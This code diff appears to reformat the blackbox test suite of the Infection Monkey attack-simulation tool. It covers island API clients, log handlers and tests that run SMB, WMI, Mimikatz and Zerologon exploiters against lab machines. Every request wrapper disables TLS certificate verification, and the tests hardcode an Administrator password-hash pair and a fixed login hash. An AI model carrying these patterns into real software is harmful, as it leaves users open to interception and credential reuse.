LOGGER = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
|
||||||
|
@ -44,7 +44,7 @@ class MonkeyIslandClient(object):
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def monkey_ran_successfully(response):
|
def monkey_ran_successfully(response):
|
||||||
return response.ok and json.loads(response.content)['is_running']
|
return response.ok and json.loads(response.content)["is_running"]
|
||||||
|
|
||||||
@avoid_race_condition
|
@avoid_race_condition
|
||||||
def kill_all_monkeys(self):
|
def kill_all_monkeys(self):
|
||||||
|
@ -65,37 +65,41 @@ class MonkeyIslandClient(object):
|
||||||
def find_monkeys_in_db(self, query):
|
def find_monkeys_in_db(self, query):
|
||||||
if query is None:
|
if query is None:
|
||||||
raise TypeError
|
raise TypeError
|
||||||
response = self.requests.get(MONKEY_TEST_ENDPOINT,
|
response = self.requests.get(
|
||||||
MonkeyIslandClient.form_find_query_for_request(query))
|
MONKEY_TEST_ENDPOINT, MonkeyIslandClient.form_find_query_for_request(query)
|
||||||
|
)
|
||||||
return MonkeyIslandClient.get_test_query_results(response)
|
return MonkeyIslandClient.get_test_query_results(response)
|
||||||
|
|
||||||
def find_telems_in_db(self, query: dict):
|
def find_telems_in_db(self, query: dict):
|
||||||
if query is None:
|
if query is None:
|
||||||
raise TypeError
|
raise TypeError
|
||||||
response = self.requests.get(TELEMETRY_TEST_ENDPOINT,
|
response = self.requests.get(
|
||||||
MonkeyIslandClient.form_find_query_for_request(query))
|
TELEMETRY_TEST_ENDPOINT, MonkeyIslandClient.form_find_query_for_request(query)
|
||||||
|
)
|
||||||
return MonkeyIslandClient.get_test_query_results(response)
|
return MonkeyIslandClient.get_test_query_results(response)
|
||||||
|
|
||||||
def get_all_monkeys_from_db(self):
|
def get_all_monkeys_from_db(self):
|
||||||
response = self.requests.get(MONKEY_TEST_ENDPOINT,
|
response = self.requests.get(
|
||||||
MonkeyIslandClient.form_find_query_for_request(None))
|
MONKEY_TEST_ENDPOINT, MonkeyIslandClient.form_find_query_for_request(None)
|
||||||
|
)
|
||||||
return MonkeyIslandClient.get_test_query_results(response)
|
return MonkeyIslandClient.get_test_query_results(response)
|
||||||
|
|
||||||
def find_log_in_db(self, query):
|
def find_log_in_db(self, query):
|
||||||
response = self.requests.get(LOG_TEST_ENDPOINT,
|
response = self.requests.get(
|
||||||
MonkeyIslandClient.form_find_query_for_request(query))
|
LOG_TEST_ENDPOINT, MonkeyIslandClient.form_find_query_for_request(query)
|
||||||
|
)
|
||||||
return MonkeyIslandClient.get_test_query_results(response)
|
return MonkeyIslandClient.get_test_query_results(response)
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def form_find_query_for_request(query: Union[dict, None]) -> dict:
|
def form_find_query_for_request(query: Union[dict, None]) -> dict:
|
||||||
return {'find_query': json_util.dumps(query)}
|
return {"find_query": json_util.dumps(query)}
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def get_test_query_results(response):
|
def get_test_query_results(response):
|
||||||
return json.loads(response.content)['results']
|
return json.loads(response.content)["results"]
|
||||||
|
|
||||||
def is_all_monkeys_dead(self):
|
def is_all_monkeys_dead(self):
|
||||||
query = {'dead': False}
|
query = {"dead": False}
|
||||||
return len(self.find_monkeys_in_db(query)) == 0
|
return len(self.find_monkeys_in_db(query)) == 0
|
||||||
|
|
||||||
def clear_caches(self):
|
def clear_caches(self):
|
||||||
|
|
|
@ -8,8 +8,10 @@ import requests
|
||||||
from envs.monkey_zoo.blackbox.island_client.supported_request_method import SupportedRequestMethod
|
from envs.monkey_zoo.blackbox.island_client.supported_request_method import SupportedRequestMethod
|
||||||
|
|
||||||
# SHA3-512 of '1234567890!@#$%^&*()_nothing_up_my_sleeve_1234567890!@#$%^&*()'
|
# SHA3-512 of '1234567890!@#$%^&*()_nothing_up_my_sleeve_1234567890!@#$%^&*()'
|
||||||
NO_AUTH_CREDS = '55e97c9dcfd22b8079189ddaeea9bce8125887e3237b800c6176c9afa80d2062' \
|
NO_AUTH_CREDS = (
|
||||||
'8d2c8d0b1538d2208c1444ac66535b764a3d902b35e751df3faec1e477ed3557'
|
"55e97c9dcfd22b8079189ddaeea9bce8125887e3237b800c6176c9afa80d2062"
|
||||||
|
"8d2c8d0b1538d2208c1444ac66535b764a3d902b35e751df3faec1e477ed3557"
|
||||||
|
)
|
||||||
LOGGER = logging.getLogger(__name__)
|
LOGGER = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
|
||||||
|
@ -18,10 +20,12 @@ class MonkeyIslandRequests(object):
|
||||||
def __init__(self, server_address):
|
def __init__(self, server_address):
|
||||||
self.addr = "https://{IP}/".format(IP=server_address)
|
self.addr = "https://{IP}/".format(IP=server_address)
|
||||||
self.token = self.try_get_jwt_from_server()
|
self.token = self.try_get_jwt_from_server()
|
||||||
self.supported_request_methods = {SupportedRequestMethod.GET: self.get,
|
self.supported_request_methods = {
|
||||||
SupportedRequestMethod.POST: self.post,
|
SupportedRequestMethod.GET: self.get,
|
||||||
SupportedRequestMethod.PATCH: self.patch,
|
SupportedRequestMethod.POST: self.post,
|
||||||
SupportedRequestMethod.DELETE: self.delete}
|
SupportedRequestMethod.PATCH: self.patch,
|
||||||
|
SupportedRequestMethod.DELETE: self.delete,
|
||||||
|
}
|
||||||
|
|
||||||
def get_request_time(self, url, method: SupportedRequestMethod, data=None):
|
def get_request_time(self, url, method: SupportedRequestMethod, data=None):
|
||||||
response = self.send_request_by_method(url, method, data)
|
response = self.send_request_by_method(url, method, data)
|
||||||
|
@ -44,7 +48,10 @@ class MonkeyIslandRequests(object):
|
||||||
return self.get_jwt_from_server()
|
return self.get_jwt_from_server()
|
||||||
except requests.ConnectionError as err:
|
except requests.ConnectionError as err:
|
||||||
LOGGER.error(
|
LOGGER.error(
|
||||||
"Unable to connect to island, aborting! Error information: {}. Server: {}".format(err, self.addr))
|
"Unable to connect to island, aborting! Error information: {}. Server: {}".format(
|
||||||
|
err, self.addr
|
||||||
|
)
|
||||||
|
)
|
||||||
assert False
|
assert False
|
||||||
|
|
||||||
class _Decorators:
|
class _Decorators:
|
||||||
|
@ -59,45 +66,45 @@ class MonkeyIslandRequests(object):
|
||||||
return request_function_wrapper
|
return request_function_wrapper
|
||||||
|
|
||||||
def get_jwt_from_server(self):
|
def get_jwt_from_server(self):
|
||||||
resp = requests.post(self.addr + "api/auth", # noqa: DUO123
|
resp = requests.post(
|
||||||
json={"username": NO_AUTH_CREDS, "password": NO_AUTH_CREDS},
|
self.addr + "api/auth", # noqa: DUO123
|
||||||
verify=False)
|
json={"username": NO_AUTH_CREDS, "password": NO_AUTH_CREDS},
|
||||||
|
verify=False,
|
||||||
|
)
|
||||||
return resp.json()["access_token"]
|
return resp.json()["access_token"]
|
||||||
|
|
||||||
@_Decorators.refresh_jwt_token
|
@_Decorators.refresh_jwt_token
|
||||||
def get(self, url, data=None):
|
def get(self, url, data=None):
|
||||||
return requests.get(self.addr + url, # noqa: DUO123
|
return requests.get(
|
||||||
headers=self.get_jwt_header(),
|
self.addr + url, # noqa: DUO123
|
||||||
params=data,
|
headers=self.get_jwt_header(),
|
||||||
verify=False)
|
params=data,
|
||||||
|
verify=False,
|
||||||
|
)
|
||||||
|
|
||||||
@_Decorators.refresh_jwt_token
|
@_Decorators.refresh_jwt_token
|
||||||
def post(self, url, data):
|
def post(self, url, data):
|
||||||
return requests.post(self.addr + url, # noqa: DUO123
|
return requests.post(
|
||||||
data=data,
|
self.addr + url, data=data, headers=self.get_jwt_header(), verify=False # noqa: DUO123
|
||||||
headers=self.get_jwt_header(),
|
)
|
||||||
verify=False)
|
|
||||||
|
|
||||||
@_Decorators.refresh_jwt_token
|
@_Decorators.refresh_jwt_token
|
||||||
def post_json(self, url, data: Dict):
|
def post_json(self, url, data: Dict):
|
||||||
return requests.post(self.addr + url, # noqa: DUO123
|
return requests.post(
|
||||||
json=data,
|
self.addr + url, json=data, headers=self.get_jwt_header(), verify=False # noqa: DUO123
|
||||||
headers=self.get_jwt_header(),
|
)
|
||||||
verify=False)
|
|
||||||
|
|
||||||
@_Decorators.refresh_jwt_token
|
@_Decorators.refresh_jwt_token
|
||||||
def patch(self, url, data: Dict):
|
def patch(self, url, data: Dict):
|
||||||
return requests.patch(self.addr + url, # noqa: DUO123
|
return requests.patch(
|
||||||
data=data,
|
self.addr + url, data=data, headers=self.get_jwt_header(), verify=False # noqa: DUO123
|
||||||
headers=self.get_jwt_header(),
|
)
|
||||||
verify=False)
|
|
||||||
|
|
||||||
@_Decorators.refresh_jwt_token
|
@_Decorators.refresh_jwt_token
|
||||||
def delete(self, url):
|
def delete(self, url):
|
||||||
return requests.delete( # noqa: DOU123
|
return requests.delete( # noqa: DOU123
|
||||||
self.addr + url,
|
self.addr + url, headers=self.get_jwt_header(), verify=False
|
||||||
headers=self.get_jwt_header(),
|
)
|
||||||
verify=False)
|
|
||||||
|
|
||||||
@_Decorators.refresh_jwt_token
|
@_Decorators.refresh_jwt_token
|
||||||
def get_jwt_header(self):
|
def get_jwt_header(self):
|
||||||
|
|
|
@ -12,16 +12,16 @@ class MonkeyLog(object):
|
||||||
self.log_dir_path = log_dir_path
|
self.log_dir_path = log_dir_path
|
||||||
|
|
||||||
def download_log(self, island_client):
|
def download_log(self, island_client):
|
||||||
log = island_client.find_log_in_db({'monkey_id': ObjectId(self.monkey['id'])})
|
log = island_client.find_log_in_db({"monkey_id": ObjectId(self.monkey["id"])})
|
||||||
if not log:
|
if not log:
|
||||||
LOGGER.error("Log for monkey {} not found".format(self.monkey['ip_addresses'][0]))
|
LOGGER.error("Log for monkey {} not found".format(self.monkey["ip_addresses"][0]))
|
||||||
return False
|
return False
|
||||||
else:
|
else:
|
||||||
self.write_log_to_file(log)
|
self.write_log_to_file(log)
|
||||||
return True
|
return True
|
||||||
|
|
||||||
def write_log_to_file(self, log):
|
def write_log_to_file(self, log):
|
||||||
with open(self.get_log_path_for_monkey(self.monkey), 'w') as log_file:
|
with open(self.get_log_path_for_monkey(self.monkey), "w") as log_file:
|
||||||
log_file.write(MonkeyLog.parse_log(log))
|
log_file.write(MonkeyLog.parse_log(log))
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
|
@ -32,7 +32,7 @@ class MonkeyLog(object):
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def get_filename_for_monkey_log(monkey):
|
def get_filename_for_monkey_log(monkey):
|
||||||
return "{}.txt".format(monkey['ip_addresses'][0])
|
return "{}.txt".format(monkey["ip_addresses"][0])
|
||||||
|
|
||||||
def get_log_path_for_monkey(self, monkey):
|
def get_log_path_for_monkey(self, monkey):
|
||||||
return os.path.join(self.log_dir_path, MonkeyLog.get_filename_for_monkey_log(monkey))
|
return os.path.join(self.log_dir_path, MonkeyLog.get_filename_for_monkey_log(monkey))
|
||||||
|
|
|
@ -5,13 +5,12 @@ LOGGER = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
|
||||||
class MonkeyLogParser(object):
|
class MonkeyLogParser(object):
|
||||||
|
|
||||||
def __init__(self, log_path):
|
def __init__(self, log_path):
|
||||||
self.log_path = log_path
|
self.log_path = log_path
|
||||||
self.log_contents = self.read_log()
|
self.log_contents = self.read_log()
|
||||||
|
|
||||||
def read_log(self):
|
def read_log(self):
|
||||||
with open(self.log_path, 'r') as log:
|
with open(self.log_path, "r") as log:
|
||||||
return log.read()
|
return log.read()
|
||||||
|
|
||||||
def print_errors(self):
|
def print_errors(self):
|
||||||
|
|
|
@ -6,7 +6,6 @@ LOGGER = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
|
||||||
class MonkeyLogsDownloader(object):
|
class MonkeyLogsDownloader(object):
|
||||||
|
|
||||||
def __init__(self, island_client, log_dir_path):
|
def __init__(self, island_client, log_dir_path):
|
||||||
self.island_client = island_client
|
self.island_client = island_client
|
||||||
self.log_dir_path = log_dir_path
|
self.log_dir_path = log_dir_path
|
||||||
|
|
|
@ -5,7 +5,7 @@ import shutil
|
||||||
from envs.monkey_zoo.blackbox.log_handlers.monkey_log_parser import MonkeyLogParser
|
from envs.monkey_zoo.blackbox.log_handlers.monkey_log_parser import MonkeyLogParser
|
||||||
from envs.monkey_zoo.blackbox.log_handlers.monkey_logs_downloader import MonkeyLogsDownloader
|
from envs.monkey_zoo.blackbox.log_handlers.monkey_logs_downloader import MonkeyLogsDownloader
|
||||||
|
|
||||||
LOG_DIR_NAME = 'logs'
|
LOG_DIR_NAME = "logs"
|
||||||
LOGGER = logging.getLogger(__name__)
|
LOGGER = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
|
||||||
|
@ -18,8 +18,10 @@ class TestLogsHandler(object):
|
||||||
def parse_test_logs(self):
|
def parse_test_logs(self):
|
||||||
log_paths = self.download_logs()
|
log_paths = self.download_logs()
|
||||||
if not log_paths:
|
if not log_paths:
|
||||||
LOGGER.error("No logs were downloaded. Maybe no monkeys were ran "
|
LOGGER.error(
|
||||||
"or early exception prevented log download?")
|
"No logs were downloaded. Maybe no monkeys were ran "
|
||||||
|
"or early exception prevented log download?"
|
||||||
|
)
|
||||||
return
|
return
|
||||||
TestLogsHandler.parse_logs(log_paths)
|
TestLogsHandler.parse_logs(log_paths)
|
||||||
|
|
||||||
|
|
|
@ -5,13 +5,10 @@ from time import sleep
|
||||||
import pytest
|
import pytest
|
||||||
from typing_extensions import Type
|
from typing_extensions import Type
|
||||||
|
|
||||||
from envs.monkey_zoo.blackbox.analyzers.communication_analyzer import \
|
from envs.monkey_zoo.blackbox.analyzers.communication_analyzer import CommunicationAnalyzer
|
||||||
CommunicationAnalyzer
|
|
||||||
from envs.monkey_zoo.blackbox.analyzers.zerologon_analyzer import ZerologonAnalyzer
|
from envs.monkey_zoo.blackbox.analyzers.zerologon_analyzer import ZerologonAnalyzer
|
||||||
from envs.monkey_zoo.blackbox.island_client.island_config_parser import \
|
from envs.monkey_zoo.blackbox.island_client.island_config_parser import IslandConfigParser
|
||||||
IslandConfigParser
|
from envs.monkey_zoo.blackbox.island_client.monkey_island_client import MonkeyIslandClient
|
||||||
from envs.monkey_zoo.blackbox.island_client.monkey_island_client import \
|
|
||||||
MonkeyIslandClient
|
|
||||||
from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemplate
|
from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemplate
|
||||||
from envs.monkey_zoo.blackbox.config_templates.drupal import Drupal
|
from envs.monkey_zoo.blackbox.config_templates.drupal import Drupal
|
||||||
from envs.monkey_zoo.blackbox.config_templates.elastic import Elastic
|
from envs.monkey_zoo.blackbox.config_templates.elastic import Elastic
|
||||||
|
@ -28,33 +25,51 @@ from envs.monkey_zoo.blackbox.config_templates.weblogic import Weblogic
|
||||||
from envs.monkey_zoo.blackbox.config_templates.wmi_mimikatz import WmiMimikatz
|
from envs.monkey_zoo.blackbox.config_templates.wmi_mimikatz import WmiMimikatz
|
||||||
from envs.monkey_zoo.blackbox.config_templates.wmi_pth import WmiPth
|
from envs.monkey_zoo.blackbox.config_templates.wmi_pth import WmiPth
|
||||||
from envs.monkey_zoo.blackbox.config_templates.zerologon import Zerologon
|
from envs.monkey_zoo.blackbox.config_templates.zerologon import Zerologon
|
||||||
from envs.monkey_zoo.blackbox.log_handlers.test_logs_handler import \
|
from envs.monkey_zoo.blackbox.log_handlers.test_logs_handler import TestLogsHandler
|
||||||
TestLogsHandler
|
|
||||||
from envs.monkey_zoo.blackbox.tests.exploitation import ExploitationTest
|
from envs.monkey_zoo.blackbox.tests.exploitation import ExploitationTest
|
||||||
from envs.monkey_zoo.blackbox.tests.performance.map_generation import \
|
from envs.monkey_zoo.blackbox.tests.performance.map_generation import MapGenerationTest
|
||||||
MapGenerationTest
|
from envs.monkey_zoo.blackbox.tests.performance.map_generation_from_telemetries import (
|
||||||
from envs.monkey_zoo.blackbox.tests.performance.map_generation_from_telemetries import \
|
MapGenerationFromTelemetryTest,
|
||||||
MapGenerationFromTelemetryTest
|
)
|
||||||
from envs.monkey_zoo.blackbox.tests.performance.report_generation import \
|
from envs.monkey_zoo.blackbox.tests.performance.report_generation import ReportGenerationTest
|
||||||
ReportGenerationTest
|
from envs.monkey_zoo.blackbox.tests.performance.report_generation_from_telemetries import (
|
||||||
from envs.monkey_zoo.blackbox.tests.performance.report_generation_from_telemetries import \
|
ReportGenerationFromTelemetryTest,
|
||||||
ReportGenerationFromTelemetryTest
|
)
|
||||||
from envs.monkey_zoo.blackbox.tests.performance.telemetry_performance_test import \
|
from envs.monkey_zoo.blackbox.tests.performance.telemetry_performance_test import (
|
||||||
TelemetryPerformanceTest
|
TelemetryPerformanceTest,
|
||||||
|
)
|
||||||
from envs.monkey_zoo.blackbox.utils import gcp_machine_handlers
|
from envs.monkey_zoo.blackbox.utils import gcp_machine_handlers
|
||||||
|
|
||||||
DEFAULT_TIMEOUT_SECONDS = 5*60
|
DEFAULT_TIMEOUT_SECONDS = 5 * 60
|
||||||
MACHINE_BOOTUP_WAIT_SECONDS = 30
|
MACHINE_BOOTUP_WAIT_SECONDS = 30
|
||||||
GCP_TEST_MACHINE_LIST = ['sshkeys-11', 'sshkeys-12', 'elastic-4', 'elastic-5', 'hadoop-2', 'hadoop-3', 'mssql-16',
|
GCP_TEST_MACHINE_LIST = [
|
||||||
'mimikatz-14', 'mimikatz-15', 'struts2-23', 'struts2-24', 'tunneling-9', 'tunneling-10',
|
"sshkeys-11",
|
||||||
'tunneling-11', 'tunneling-12', 'weblogic-18', 'weblogic-19', 'shellshock-8', 'zerologon-25',
|
"sshkeys-12",
|
||||||
'drupal-28']
|
"elastic-4",
|
||||||
|
"elastic-5",
|
||||||
|
"hadoop-2",
|
||||||
|
"hadoop-3",
|
||||||
|
"mssql-16",
|
||||||
|
"mimikatz-14",
|
||||||
|
"mimikatz-15",
|
||||||
|
"struts2-23",
|
||||||
|
"struts2-24",
|
||||||
|
"tunneling-9",
|
||||||
|
"tunneling-10",
|
||||||
|
"tunneling-11",
|
||||||
|
"tunneling-12",
|
||||||
|
"weblogic-18",
|
||||||
|
"weblogic-19",
|
||||||
|
"shellshock-8",
|
||||||
|
"zerologon-25",
|
||||||
|
"drupal-28",
|
||||||
|
]
|
||||||
LOG_DIR_PATH = "./logs"
|
LOG_DIR_PATH = "./logs"
|
||||||
logging.basicConfig(level=logging.INFO)
|
logging.basicConfig(level=logging.INFO)
|
||||||
LOGGER = logging.getLogger(__name__)
|
LOGGER = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
|
||||||
@pytest.fixture(autouse=True, scope='session')
|
@pytest.fixture(autouse=True, scope="session")
|
||||||
def GCPHandler(request, no_gcp):
|
def GCPHandler(request, no_gcp):
|
||||||
if not no_gcp:
|
if not no_gcp:
|
||||||
GCPHandler = gcp_machine_handlers.GCPHandler()
|
GCPHandler = gcp_machine_handlers.GCPHandler()
|
||||||
|
@ -67,7 +82,7 @@ def GCPHandler(request, no_gcp):
|
||||||
request.addfinalizer(fin)
|
request.addfinalizer(fin)
|
||||||
|
|
||||||
|
|
||||||
@pytest.fixture(autouse=True, scope='session')
|
@pytest.fixture(autouse=True, scope="session")
|
||||||
def delete_logs():
|
def delete_logs():
|
||||||
LOGGER.info("Deleting monkey logs before new tests.")
|
LOGGER.info("Deleting monkey logs before new tests.")
|
||||||
TestLogsHandler.delete_log_folder_contents(TestMonkeyBlackbox.get_log_dir_path())
|
TestLogsHandler.delete_log_folder_contents(TestMonkeyBlackbox.get_log_dir_path())
|
||||||
|
@ -77,7 +92,7 @@ def wait_machine_bootup():
|
||||||
sleep(MACHINE_BOOTUP_WAIT_SECONDS)
|
sleep(MACHINE_BOOTUP_WAIT_SECONDS)
|
||||||
|
|
||||||
|
|
||||||
@pytest.fixture(scope='class')
|
@pytest.fixture(scope="class")
|
||||||
def island_client(island, quick_performance_tests):
|
def island_client(island, quick_performance_tests):
|
||||||
island_client_object = MonkeyIslandClient(island)
|
island_client_object = MonkeyIslandClient(island)
|
||||||
if not quick_performance_tests:
|
if not quick_performance_tests:
|
||||||
|
@ -85,41 +100,55 @@ def island_client(island, quick_performance_tests):
|
||||||
yield island_client_object
|
yield island_client_object
|
||||||
|
|
||||||
|
|
||||||
@pytest.mark.usefixtures('island_client')
|
@pytest.mark.usefixtures("island_client")
|
||||||
# noinspection PyUnresolvedReferences
|
# noinspection PyUnresolvedReferences
|
||||||
class TestMonkeyBlackbox:
|
class TestMonkeyBlackbox:
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def run_exploitation_test(island_client: MonkeyIslandClient,
|
def run_exploitation_test(
|
||||||
config_template: Type[ConfigTemplate],
|
island_client: MonkeyIslandClient,
|
||||||
test_name: str,
|
config_template: Type[ConfigTemplate],
|
||||||
timeout_in_seconds=DEFAULT_TIMEOUT_SECONDS):
|
test_name: str,
|
||||||
|
timeout_in_seconds=DEFAULT_TIMEOUT_SECONDS,
|
||||||
|
):
|
||||||
raw_config = IslandConfigParser.get_raw_config(config_template, island_client)
|
raw_config = IslandConfigParser.get_raw_config(config_template, island_client)
|
||||||
analyzer = CommunicationAnalyzer(island_client,
|
analyzer = CommunicationAnalyzer(
|
||||||
IslandConfigParser.get_ips_of_targets(raw_config))
|
island_client, IslandConfigParser.get_ips_of_targets(raw_config)
|
||||||
log_handler = TestLogsHandler(test_name, island_client, TestMonkeyBlackbox.get_log_dir_path())
|
)
|
||||||
|
log_handler = TestLogsHandler(
|
||||||
|
test_name, island_client, TestMonkeyBlackbox.get_log_dir_path()
|
||||||
|
)
|
||||||
ExploitationTest(
|
ExploitationTest(
|
||||||
name=test_name,
|
name=test_name,
|
||||||
island_client=island_client,
|
island_client=island_client,
|
||||||
raw_config=raw_config,
|
raw_config=raw_config,
|
||||||
analyzers=[analyzer],
|
analyzers=[analyzer],
|
||||||
timeout=timeout_in_seconds,
|
timeout=timeout_in_seconds,
|
||||||
log_handler=log_handler).run()
|
log_handler=log_handler,
|
||||||
|
).run()
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def run_performance_test(performance_test_class, island_client,
|
def run_performance_test(
|
||||||
config_template, timeout_in_seconds, break_on_timeout=False):
|
performance_test_class,
|
||||||
|
island_client,
|
||||||
|
config_template,
|
||||||
|
timeout_in_seconds,
|
||||||
|
break_on_timeout=False,
|
||||||
|
):
|
||||||
raw_config = IslandConfigParser.get_raw_config(config_template, island_client)
|
raw_config = IslandConfigParser.get_raw_config(config_template, island_client)
|
||||||
log_handler = TestLogsHandler(performance_test_class.TEST_NAME,
|
log_handler = TestLogsHandler(
|
||||||
island_client,
|
performance_test_class.TEST_NAME, island_client, TestMonkeyBlackbox.get_log_dir_path()
|
||||||
TestMonkeyBlackbox.get_log_dir_path())
|
)
|
||||||
analyzers = [CommunicationAnalyzer(island_client, IslandConfigParser.get_ips_of_targets(raw_config))]
|
analyzers = [
|
||||||
performance_test_class(island_client=island_client,
|
CommunicationAnalyzer(island_client, IslandConfigParser.get_ips_of_targets(raw_config))
|
||||||
raw_config=raw_config,
|
]
|
||||||
analyzers=analyzers,
|
performance_test_class(
|
||||||
timeout=timeout_in_seconds,
|
island_client=island_client,
|
||||||
log_handler=log_handler,
|
raw_config=raw_config,
|
||||||
break_on_timeout=break_on_timeout).run()
|
analyzers=analyzers,
|
||||||
|
timeout=timeout_in_seconds,
|
||||||
|
log_handler=log_handler,
|
||||||
|
break_on_timeout=break_on_timeout,
|
||||||
|
).run()
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def get_log_dir_path():
|
def get_log_dir_path():
|
||||||
|
@ -138,7 +167,9 @@ class TestMonkeyBlackbox:
|
||||||
TestMonkeyBlackbox.run_exploitation_test(island_client, Mssql, "MSSQL_exploiter")
|
TestMonkeyBlackbox.run_exploitation_test(island_client, Mssql, "MSSQL_exploiter")
|
||||||
|
|
||||||
def test_smb_and_mimikatz_exploiters(self, island_client):
|
def test_smb_and_mimikatz_exploiters(self, island_client):
|
||||||
TestMonkeyBlackbox.run_exploitation_test(island_client, SmbMimikatz, "SMB_exploiter_mimikatz")
|
TestMonkeyBlackbox.run_exploitation_test(
|
||||||
|
island_client, SmbMimikatz, "SMB_exploiter_mimikatz"
|
||||||
|
)
|
||||||
|
|
||||||
def test_smb_pth(self, island_client):
|
def test_smb_pth(self, island_client):
|
||||||
TestMonkeyBlackbox.run_exploitation_test(island_client, SmbPth, "SMB_PTH")
|
TestMonkeyBlackbox.run_exploitation_test(island_client, SmbPth, "SMB_PTH")
|
||||||
|
@ -159,31 +190,42 @@ class TestMonkeyBlackbox:
|
||||||
TestMonkeyBlackbox.run_exploitation_test(island_client, ShellShock, "Shellschock_exploiter")
|
TestMonkeyBlackbox.run_exploitation_test(island_client, ShellShock, "Shellschock_exploiter")
|
||||||
|
|
||||||
def test_tunneling(self, island_client):
|
def test_tunneling(self, island_client):
|
||||||
TestMonkeyBlackbox.run_exploitation_test(island_client, Tunneling, "Tunneling_exploiter", 15 * 60)
|
TestMonkeyBlackbox.run_exploitation_test(
|
||||||
|
island_client, Tunneling, "Tunneling_exploiter", 15 * 60
|
||||||
|
)
|
||||||
|
|
||||||
def test_wmi_and_mimikatz_exploiters(self, island_client):
|
def test_wmi_and_mimikatz_exploiters(self, island_client):
|
||||||
TestMonkeyBlackbox.run_exploitation_test(island_client, WmiMimikatz, "WMI_exploiter,_mimikatz")
|
TestMonkeyBlackbox.run_exploitation_test(
|
||||||
|
island_client, WmiMimikatz, "WMI_exploiter,_mimikatz"
|
||||||
|
)
|
||||||
|
|
||||||
def test_wmi_pth(self, island_client):
|
def test_wmi_pth(self, island_client):
|
||||||
TestMonkeyBlackbox.run_exploitation_test(island_client, WmiPth, "WMI_PTH")
|
TestMonkeyBlackbox.run_exploitation_test(island_client, WmiPth, "WMI_PTH")
|
||||||
|
|
||||||
def test_zerologon_exploiter(self, island_client):
|
def test_zerologon_exploiter(self, island_client):
|
||||||
test_name = "Zerologon_exploiter"
|
test_name = "Zerologon_exploiter"
|
||||||
expected_creds = ["Administrator",
|
expected_creds = [
|
||||||
"aad3b435b51404eeaad3b435b51404ee",
|
"Administrator",
|
||||||
"2864b62ea4496934a5d6e86f50b834a5"]
|
"aad3b435b51404eeaad3b435b51404ee",
|
||||||
|
"2864b62ea4496934a5d6e86f50b834a5",
|
||||||
|
]
|
||||||
raw_config = IslandConfigParser.get_raw_config(Zerologon, island_client)
|
raw_config = IslandConfigParser.get_raw_config(Zerologon, island_client)
|
||||||
analyzer = ZerologonAnalyzer(island_client, expected_creds)
|
analyzer = ZerologonAnalyzer(island_client, expected_creds)
|
||||||
log_handler = TestLogsHandler(test_name, island_client, TestMonkeyBlackbox.get_log_dir_path())
|
log_handler = TestLogsHandler(
|
||||||
|
test_name, island_client, TestMonkeyBlackbox.get_log_dir_path()
|
||||||
|
)
|
||||||
ExploitationTest(
|
ExploitationTest(
|
||||||
name=test_name,
|
name=test_name,
|
||||||
island_client=island_client,
|
island_client=island_client,
|
||||||
raw_config=raw_config,
|
raw_config=raw_config,
|
||||||
analyzers=[analyzer],
|
analyzers=[analyzer],
|
||||||
timeout=DEFAULT_TIMEOUT_SECONDS,
|
timeout=DEFAULT_TIMEOUT_SECONDS,
|
||||||
log_handler=log_handler).run()
|
log_handler=log_handler,
|
||||||
|
).run()
|
||||||
|
|
||||||
@pytest.mark.skip(reason="Perfomance test that creates env from fake telemetries is faster, use that instead.")
|
@pytest.mark.skip(
|
||||||
|
reason="Perfomance test that creates env from fake telemetries is faster, use that instead."
|
||||||
|
)
|
||||||
def test_report_generation_performance(self, island_client, quick_performance_tests):
|
def test_report_generation_performance(self, island_client, quick_performance_tests):
|
||||||
"""
|
"""
|
||||||
This test includes the SSH + Elastic + Hadoop + MSSQL machines all in one test
|
This test includes the SSH + Elastic + Hadoop + MSSQL machines all in one test
|
||||||
|
@ -193,21 +235,21 @@ class TestMonkeyBlackbox:
|
||||||
and the Timing one which checks how long the report took to execute
|
and the Timing one which checks how long the report took to execute
|
||||||
"""
|
"""
|
||||||
if not quick_performance_tests:
|
if not quick_performance_tests:
|
||||||
TestMonkeyBlackbox.run_performance_test(ReportGenerationTest,
|
TestMonkeyBlackbox.run_performance_test(
|
||||||
island_client,
|
ReportGenerationTest, island_client, Performance, timeout_in_seconds=10 * 60
|
||||||
Performance,
|
)
|
||||||
timeout_in_seconds=10*60)
|
|
||||||
else:
|
else:
|
||||||
LOGGER.error("This test doesn't support 'quick_performance_tests' option.")
|
LOGGER.error("This test doesn't support 'quick_performance_tests' option.")
|
||||||
assert False
|
assert False
|
||||||
|
|
||||||
@pytest.mark.skip(reason="Perfomance test that creates env from fake telemetries is faster, use that instead.")
|
@pytest.mark.skip(
|
||||||
|
reason="Perfomance test that creates env from fake telemetries is faster, use that instead."
|
||||||
|
)
|
||||||
def test_map_generation_performance(self, island_client, quick_performance_tests):
|
def test_map_generation_performance(self, island_client, quick_performance_tests):
|
||||||
if not quick_performance_tests:
|
if not quick_performance_tests:
|
||||||
TestMonkeyBlackbox.run_performance_test(MapGenerationTest,
|
TestMonkeyBlackbox.run_performance_test(
|
||||||
island_client,
|
MapGenerationTest, island_client, "PERFORMANCE.conf", timeout_in_seconds=10 * 60
|
||||||
"PERFORMANCE.conf",
|
)
|
||||||
timeout_in_seconds=10*60)
|
|
||||||
else:
|
else:
|
||||||
LOGGER.error("This test doesn't support 'quick_performance_tests' option.")
|
LOGGER.error("This test doesn't support 'quick_performance_tests' option.")
|
||||||
assert False
|
assert False
|
||||||
|
@ -219,4 +261,6 @@ class TestMonkeyBlackbox:
|
||||||
MapGenerationFromTelemetryTest(island_client, quick_performance_tests).run()
|
MapGenerationFromTelemetryTest(island_client, quick_performance_tests).run()
|
||||||
|
|
||||||
